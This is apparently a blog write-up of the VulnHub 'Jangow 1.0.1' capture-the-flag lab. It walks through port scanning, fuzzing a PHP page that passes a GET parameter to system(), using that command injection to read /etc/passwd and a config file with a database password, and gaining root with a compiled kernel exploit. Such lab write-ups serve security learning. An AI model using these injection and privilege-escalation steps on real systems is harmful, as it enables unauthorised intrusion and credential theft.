[VulnHub] Jangow: 1.0.1

[VulnHub] Jangow: 1.0.1

https://www.vulnhub.com/entry/jangow-101,754/

·

4 min read

Description: This is a write-up of the Jangow 1.0.1 CTF in VulnHub. This is an easy box, in which I'll cover how I got the root flag using HTTP RCE and Privilege Escalation

Footprinting

Open ports

I looked for open ports using Nmap:

kali@kali:~$ mkdir nmap
kali@kali:~$ sudo nmap -v3 -O -sS -p- -Pn -oA nmap/syn_full 192.168.56.118
Scanning 192.168.56.118 [65535 ports]
Discovered open port 21/tcp on 192.168.56.118
Discovered open port 80/tcp on 192.168.56.118

Ports 21 (FTP) and 80 (HTTP) are opened (ports list)

Scanning for vulnerabilities in these ports shows nothing really interesting:

kali@kali:~$ nmap -v3 -p21,80 -sC -sV -oA nmap/vuln 192.168.56.118
kali@kali:~$ cat nmap/vuln.nmap
PORT   STATE SERVICE REASON          VERSION
21/tcp open  ftp     syn-ack ttl 255 vsftpd 3.0.3
80/tcp open  http    syn-ack ttl 255 Apache httpd 2.4.18
| http-ls: Volume /
| SIZE  TIME              FILENAME
| -     2021-06-10 18:05  site/
|_
| http-methods: 
|_  Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Index of /

HTTP

Enumeration

Let's enumerate the resources of the website using dirb:

kali@kali:~$ dirb http://192.168.56.118/ /usr/share/wordlists/dirb/common.txt -o dirb.txt
kali@kali:~$ cat dirb.txt
---- Scanning URL: http://192.168.56.118/ ----
+ http://192.168.56.118/server-status (CODE:403|SIZE:279)
==> DIRECTORY: http://192.168.56.118/site/
---- Entering directory: http://192.168.56.118/site/ ----
==> DIRECTORY: http://192.168.56.118/site/assets/
==> DIRECTORY: http://192.168.56.118/site/css/
+ http://192.168.56.118/site/index.html (CODE:200|SIZE:10190)
==> DIRECTORY: http://192.168.56.118/site/js/
==> DIRECTORY: http://192.168.56.118/site/wordpress/
---- Entering directory: http://192.168.56.118/site/assets/ ----
---- Entering directory: http://192.168.56.118/site/css/ ----
---- Entering directory: http://192.168.56.118/site/js/ ----
---- Entering directory: http://192.168.56.118/site/wordpress/ ----

When navigating in the website, I saw a page called busque.php :

http://192.168.56.118/site/busque.php?buscar=

After a lot of trials and errors, the next enumeration gave me some hints:

kali@kali:~$ sudo apt install seclists
kali@kali:~$ while read l; do 
    echo $l; 
    curl "http://192.168.56.118/site/busque.php?buscar=$l" >> buscar.txt; 
done < /usr/share/seclists/Fuzzing/1-4_all_letters_a-z.txt

Basically, this loop fuzzes every line of the 1-4_all_letters_a-z.txt wordlist in the busque parameter, and appends each output in the file busque.txt:

kali@kali:~$ less buscar.txt

USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
Filesystem     1K-blocks    Used Available Use% Mounted on
udev              488968       0    488968   0% /dev
tmpfs             101628    3192     98436   4% /run
/dev/sda1       11221232 2095112   8533072  20% /
tmpfs             508136       0    508136   0% /dev/shm
tmpfs               5120       0      5120   0% /run/lock
tmpfs             508136       0    508136   0% /sys/fs/cgroup
8       ./js
20      ./wordpress
1100    ./assets/img
1128    ./assets
208     ./css
1388    .
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Usage:  iw [options] command
Options:
        --debug         enable netlink debugging
        --version       show version (3.17)
Commands:
...

Oh ?! This output sounds familiar !

Usage:  iw [options] command
Options:
        --debug         enable netlink debugging
        --version       show version (3.17)
Commands:
...

It's the manual of a command called iw.

OS command execution

You probably guessed it ! We have access to a shell on the web server using the buscar GET parameter:

>>>
GET /site/busque.php?buscar=ls+-a HTTP/1.1
Host: 192.168.56.118

<<<
.
..
assets
busque.php
css
index.html
js
wordpress

We can use this simple Python script to automate the OS command injections through the URL.

Indeed, the content of busque.php is:

>>>
GET /site/busque.php?buscar=cat+busque.php HTTP/1.1
Host: 192.168.56.118

<<<
<?php system($_GET['buscar']); ?>

system — Execute an external program and display the output

In the wordpress directory, there is a configuration file:

>>>
GET /site/busque.php?buscar=ls+wordpress HTTP/1.1
Host: 192.168.56.118

<<<
config.php
index.html

And it contains a password !

>>>
GET /site/busque.php?buscar=cat+wordpress/config.php HTTP/1.1
Host: 192.168.56.118

<<<
<?php
$servername = "localhost";
$database = "desafio02";
$username = "desafio02";
$password = "abygurl69";
// Create connection
$conn = mysqli_connect($servername, $username, $password, $database);
// Check connection
if (!$conn) {
    die("Connection failed: " . mysqli_connect_error());
}
echo "Connected successfully";
mysqli_close($conn);
?>

FTP

Let's try these credentials in FTP :

kali@kali:~$ ftp 192.168.56.118                                                                           
Connected to 192.168.56.118.
220 (vsFTPd 3.0.3)
Name (192.168.56.118:kali): desafio02
331 Please specify the password.
Password:
530 Login incorrect.
Login failed.

Ok, it failed :/

Local privilege escalation

user.txt

Actually, this password is the one of jangow01, where the credentials are jangow01:abygurl69. Thus, we can switch to the jangow's virtual machine and fill the login prompt.

In jangow01's home directory, we got the user flag :-]

jangow01@jangow01:~$ cat /home/jangow01/user.txt
d4[...]7e

Are there other users registered in the web server ?

>>>
GET /site/busque.php?buscar=grep+sh$+/etc/passwd HTTP/1.1
Host: 192.168.56.118

<<<
root:x:0:0:root:/root:/bin/bash
jangow01:x:1000:1000:desafio02,,,:/home/jangow01:/bin/bash

Nope (other than root). So we wanna escalate from jangow01 to root.

proof.txt

Looking at kernel's information, lots of exploits exist:

jangow01@jangow01:~$ uname -a
Ubuntu 16.04, kernel 4.4.0-31

After trials and errors this one worked. I compiled the exploit in the machine, and executed it:

More details here.

jangow01@jangow01:~$ gcc ./cve-2017-16995.c -o ./cve-2017-16995
jangow01@jangow01:~$ chmod +x ./cve-2017-16995
jangow01@jangow01:~$ ./cve-2017-16995

Finally, we can read the root flag !

$ whoami
root

$ ls /root
proof.txt

$ cat /root/proof.txt
                       @@@&&&&&&&&&&&&&&&&&&&@@@@@@@@@@@@@@@&&&&&&&&&&&&&&                          
                       @  @@@@@@@@@@@@@@@&#   #@@@@@@@@&(.    /&@@@@@@@@@@                          
                       @  @@@@@@@@@@&( .@@@@@@@@&%####((//#&@@@&   .&@@@@@                          
                       @  @@@@@@@&  @@@@@@&@@@@@&%######%&@*   ./@@*   &@@                          
                       @  @@@@@* (@@@@@@@@@#/.               .*@.  .#&.   &@@@&&                    
                       @  @@@, /@@@@@@@@#,                       .@.  ,&,   @@&&                    
                       @  @&  @@@@@@@@#.         @@@,@@@/           %.  #,   %@&                    
                       @@@#  @@@@@@@@/         .@@@@@@@@@@            *  .,    @@                   
                       @@&  @@@@@@@@*          @@@@@@@@@@@             ,        @                   
                       @&  .@@@@@@@(      @@@@@@@@@@@@@@@@@@@@@        *.       &@                  
                      @@/  *@@@@@@@/           @@@@@@@@@@@#                      @@                 
                      @@   .@@@@@@@/          @@@@@@@@@@@@@              @#      @@                 
                      @@    @@@@@@@@.          @@@@@@@@@@@              @@(      @@                 
                       @&   .@@@@@@@@.         , @@@@@@@ *            .@@@*(    .@                  
                       @@    ,@@@@@@@@,   @@@@@@@@@&*%@@@@@@@@@,    @@@@@(%&*   &@                  
                       @@&     @@@@@@@@@@@@@@@@@         (@@@@@@@@@@@@@@%@@/   &@                   
                       @ @&     ,@@@@@@@@@@@@@@@,@@@@@@@&%@@@@@@@@@@@@@@@%*   &@                    
                       @  @@.     .@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%*    &@&                    
                       @  @@@&       ,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%/     &@@&&                    
                       @  @@@@@@.        *%@@@@@@@@@@@@@@@@@@@@&#/.      &@@@@&&                    
                       @  @@@@@@@@&               JANGOW               &@@@                          
                       @  &&&&&&&&&@@@&     @@(&@ @. %.@ @@%@     &@@@&&&&                          
                                     &&&@@@@&%       &/    (&&@@@&&&                                
                                       (((((((((((((((((((((((((((((





da[...]09

Did you find this article valuable?

Support jamarir's blog by becoming a sponsor. Any amount is appreciated!